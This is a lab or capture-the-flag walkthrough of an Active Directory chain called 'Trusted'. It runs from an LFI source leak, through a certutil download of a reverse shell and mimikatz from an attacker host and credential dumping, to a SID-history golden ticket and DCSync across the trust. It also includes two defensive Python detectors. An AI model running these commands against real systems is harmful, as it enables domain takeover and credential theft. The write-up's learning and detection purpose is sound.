Chain - Trusted
Initial Recon
Targets:
- 10.10.226.245 (trusted.vl)
- 10.10.226.246 (lab.trusted.vl)
Services Identified:
- LDAP, Kerberos, RDP, HTTP/HTTPS, SMB, RPC on both
- Apache + XAMPP on lab.trusted.vl
Web Enumeration (10.10.226.246)
XAMPP Apache
- Version: Apache/2.4.53, PHP/8.1.6
- phpinfo exposed: /dashboard/phpinfo.php
- allow_url_fopen enabled
Fuzzing
wfuzz -c --hh 306 -w raft-medium-directories.txt http://labdc.lab.trusted.vl/FUZZ
Found: /dev
LFI + Source Disclosure: the view parameter accepts a php://filter wrapper, so the PHP source of db.php is returned base64-encoded instead of being executed:
/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
Credentials found:
- User: root
- Pass: [REDACTED]
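Added example, not part of the original writeup: a small Python scanner over Apache access log lines that flags the php://filter wrapper used above, URL-encoded path traversal in the query string, and direct hits on the exposed phpinfo page. The log lines are constructed for illustration; the field layout follows Apache's combined log format, and the indicator names are my own.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (sample data, not from the original page).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Jun/2024:10:01:02 +0000] "GET /dev/index.html?view=index.php HTTP/1.1" 200 1530 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jun/2024:10:01:09 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=db.php HTTP/1.1" 200 2312 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Jun/2024:10:01:15 +0000] "GET /dev/index.html?view=%2e%2e%2f%2e%2e%2fwin.ini HTTP/1.1" 200 890 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Jun/2024:10:02:00 +0000] "GET /dashboard/phpinfo.php HTTP/1.1" 200 70211 "-" "curl/8.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# PHP stream wrappers that should never appear in a user-controlled include/read path
WRAPPER_RE = re.compile(r'\b(php|file|data|phar|glob|expect)://', re.IGNORECASE)
# Dot-dot segments with either separator (a Windows host behind XAMPP accepts both)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')
# Diagnostic pages that should not be reachable in production
SENSITIVE_PATHS = {'/dashboard/phpinfo.php'}


def normalize_target(target: str) -> str:
    """URL-decode twice so single- and double-encoded payloads compare equal."""
    return unquote(unquote(target))


def classify(target: str) -> list[str]:
    """Return indicator names found in one request target (path + query)."""
    decoded = normalize_target(target)
    indicators = []
    if WRAPPER_RE.search(decoded):
        indicators.append('php-wrapper')
    if TRAVERSAL_RE.search(decoded):
        indicators.append('path-traversal')
    path = decoded.split('?', 1)[0].lower()
    if path in SENSITIVE_PATHS:
        indicators.append('phpinfo-access')
    return indicators


def scan_access_log(text: str) -> list[dict]:
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than abort the whole file
        indicators = classify(m['target'])
        if indicators:
            findings.append({
                'ip': m['ip'],
                'time': m['ts'],
                'target': m['target'],
                'status': int(m['status']),
                'indicators': indicators,
            })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['status']} {','.join(f['indicators'])} {f['target']}")
```

The double decode matters: a single `unquote` misses `%252e%252e%252f`, which the web server itself may decode twice depending on rewrite rules. Pairing a 200 status with a wrapper hit is the strongest signal, since a blocked attempt would normally return 4xx.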
MySQL Access
mysql -h labdc.lab.trusted.vl -u root -p
use news;
select * from users;
Cracked rsmith's password: [REDACTED]
SMB + BloodHound
nxc smb 10.10.136.38 -u rsmith -p '[REDACTED]' --shares
bloodhound-python -u rsmith -p [REDACTED] -d lab.trusted.vl -dc labdc.lab.trusted.vl -ns 10.10.136.38
- rsmith can reset ewalters' password
PrivEsc: ewalters Access
Set-DomainUserPassword -Identity EWALTERS -AccountPassword [REDACTED]
Login via WinRM:
evil-winrm -i 10.10.136.38 -u ewalters -p [REDACTED]
- Has SeMachineAccountPrivilege
Readme.txt Clue
C:/AVTest/readme.txt
Christine ran AV tools here; likely a test environment.
XAMPP RCE via PHP Reverse Shell
certutil.exe -urlcache -split -f http://attacker/winphprevshell.php rev.php
Visit https://labdc.lab.trusted.vl/rev.php
Gain SYSTEM shell (XAMPP runs the Apache service as LocalSystem by default, so the web shell inherits that account)
Dump Credentials (Local Admin Access)
certutil.exe -urlcache -split -f http://attacker/mimikatz.exe mimikatz.exe
mimikatz "privilege::debug" "lsadump::lsa /patch"
Dumped Administrator NTLM hash: [REDACTED]
Login as Administrator
evil-winrm -i 10.10.136.38 -u Administrator -H [REDACTED]
Dump Other Credentials
secretsdump.py lab.trusted.vl/'LABDC$'@10.10.136.38 -hashes :[REDACTED]
Trust Enumeration
Get-ADTrust -Filter *
Bidirectional trust: lab.trusted.vl <-> trusted.vl
Cross-Trust Attack (Golden Ticket with SID History)
krbtgt NTLM (child): [REDACTED]
Domain SID (parent): S-1-5-21-3576695518-347000760-3731839591 (the -519 suffix appended below is the parent's Enterprise Admins group; it is honoured because SID filtering is not applied on intra-forest parent-child trusts by default)
Create Golden Ticket:
mimikatz "kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /krbtgt:[REDACTED] /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt"
Dump Trusted DC creds:
lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all
Administrator NTLM (trusted): [REDACTED]
Full DA Access to Trusted Domain
evil-winrm -i 10.10.226.245 -u Administrator -H [REDACTED]
(Optional) Automated Golden Ticket
impacket-raiseChild lab.trusted.vl/cpowers -hashes :[REDACTED]
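Added example, not part of the original writeup: the /sids value above places the parent domain's Enterprise Admins SID (RID 519) in the ticket's SID history, and the parent accepts it because intra-forest parent-child trusts do not filter SIDs. The Python below, written for this page, parses S-1-5-21 SIDs, flags group SIDs that belong to a different domain than the account and carry a privileged RID (the check a defender can run over the group list recorded for a logon), and models what SID filtering would have stripped. The two domain SIDs are taken from the page; the account and group SIDs built from them, and the domain-name map, are constructed for illustration.

```python
from __future__ import annotations

# Well-known RIDs of built-in high-privilege domain groups
PRIVILEGED_RIDS = {
    512: 'Domain Admins',
    516: 'Domain Controllers',
    518: 'Schema Admins',
    519: 'Enterprise Admins',
    520: 'Group Policy Creator Owners',
}

# Domain SIDs from the writeup; account and group SIDs below are constructed from them.
CHILD_DOMAIN_SID = 'S-1-5-21-2241985869-2159962460-1278545866'   # lab.trusted.vl
PARENT_DOMAIN_SID = 'S-1-5-21-3576695518-347000760-3731839591'   # trusted.vl
DOMAIN_NAMES = {CHILD_DOMAIN_SID: 'lab.trusted.vl', PARENT_DOMAIN_SID: 'trusted.vl'}


def split_sid(sid: str) -> tuple[str, int | None]:
    """Split an S-1-5-21-<a>-<b>-<c>[-<rid>] SID into (domain_sid, rid).

    A bare domain SID yields rid=None. Anything that is not domain-relative
    (S-1-5-18 LocalSystem, S-1-1-0 Everyone, ...) raises ValueError so a caller
    cannot silently attribute it to some domain.
    """
    parts = sid.split('-')
    if parts[:4] != ['S', '1', '5', '21'] or len(parts) not in (7, 8):
        raise ValueError(f'not a domain-relative SID: {sid}')
    if not all(p.isdigit() for p in parts[1:]):
        raise ValueError(f'non-numeric sub-authority in SID: {sid}')
    domain = '-'.join(parts[:7])
    rid = int(parts[7]) if len(parts) == 8 else None
    return domain, rid


def foreign_privileged_sids(account_sid: str, group_sids: list[str]) -> list[dict]:
    """Flag group SIDs from a different domain than the account that carry a privileged RID.

    This is the footprint SID-history injection leaves in a logon's group list: a
    child-domain account suddenly carrying the parent's Enterprise Admins (519) SID.
    """
    home_domain, _ = split_sid(account_sid)
    alerts = []
    for sid in group_sids:
        domain, rid = split_sid(sid)
        if domain != home_domain and rid in PRIVILEGED_RIDS:
            alerts.append({
                'sid': sid,
                'domain': DOMAIN_NAMES.get(domain, 'unknown domain'),
                'group': PRIVILEGED_RIDS[rid],
            })
    return alerts


def sid_filter(ticket_sids: list[str], source_domain_sid: str) -> list[str]:
    """Model SID filtering (trust quarantine): keep only SIDs owned by the domain the
    ticket came from. Inter-forest trusts do this by default; parent-child trusts inside
    one forest do not, which is what the golden ticket above relies on."""
    return [sid for sid in ticket_sids if split_sid(sid)[0] == source_domain_sid]


def demo() -> tuple[list[dict], list[str]]:
    # Constructed: child-domain Administrator (RID 500) whose ticket carries Domain Users (513)
    # and Domain Admins (512) from its own domain plus the parent's Enterprise Admins (519).
    account = CHILD_DOMAIN_SID + '-500'
    groups = [CHILD_DOMAIN_SID + '-513', CHILD_DOMAIN_SID + '-512', PARENT_DOMAIN_SID + '-519']
    return foreign_privileged_sids(account, groups), sid_filter(groups, CHILD_DOMAIN_SID)


if __name__ == '__main__':
    alerts, filtered = demo()
    for a in alerts:
        print(f"ALERT foreign privileged SID {a['sid']} ({a['group']} of {a['domain']})")
    print('after SID filtering:', filtered)
```

The practical consequence for the defender is the one the page demonstrates: a child domain's krbtgt hash is a forest-wide compromise, so the child DC needs the same protection as the forest root, and privileged cross-domain SIDs appearing on accounts from another domain deserve an alert rather than a shrug.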
Final Step - Decrypt Flag
[System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")
The file carries the EFS Encrypted attribute, so it cannot be read from the hash-based WinRM session. Set a new Administrator password and run:
runas.exe Administrator "[REDACTED]" "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"